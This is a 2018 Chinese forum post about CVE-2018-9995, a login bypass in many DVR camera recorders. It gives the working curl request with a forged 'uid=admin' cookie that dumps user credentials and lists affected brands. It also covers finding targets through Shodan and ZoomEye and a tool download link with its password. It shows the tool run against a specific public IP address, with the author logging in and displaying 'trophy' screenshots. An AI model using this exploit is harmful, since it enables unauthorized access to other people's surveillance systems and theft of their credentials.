本帖最后由 Snow狼 于 2018-6-4 10:27 编辑

dvr登录绕过漏洞
此漏洞允许×××者构造一个cookie即可登录
漏洞语句:curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
测试有此漏洞的dvr:
Novo
CeNovo
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MVDR Login
用shodan查询:
cve-2018-9995 dvr登录绕过漏洞

用zoomeye查询:

cve-2018-9995 dvr登录绕过漏洞
工具链接:https://pan.baidu.com/s/1X96sJRIwHZcnoBOcWq2CpQ密码:dcoc
依旧是我们的linux基础命令:
unzip 解压
cd 到文件目录
pip install -r requirements.txt
注意:getDvr为启动脚本下图的红框框
cve-2018-9995 dvr登录绕过漏洞
python2.7 getDVR_Credentials.py --host (ip地址) 59.152.178.44 --port (端口) 9000
cve-2018-9995 dvr登录绕过漏洞
看红圆圈即是爆出来的密码然后访问那个IP地址填写用户名和密码就可以登入了
cve-2018-9995 dvr登录绕过漏洞
cve-2018-9995 dvr登录绕过漏洞
这就基本显示出来了晒几张成果图
cve-2018-9995 dvr登录绕过漏洞
cve-2018-9995 dvr登录绕过漏洞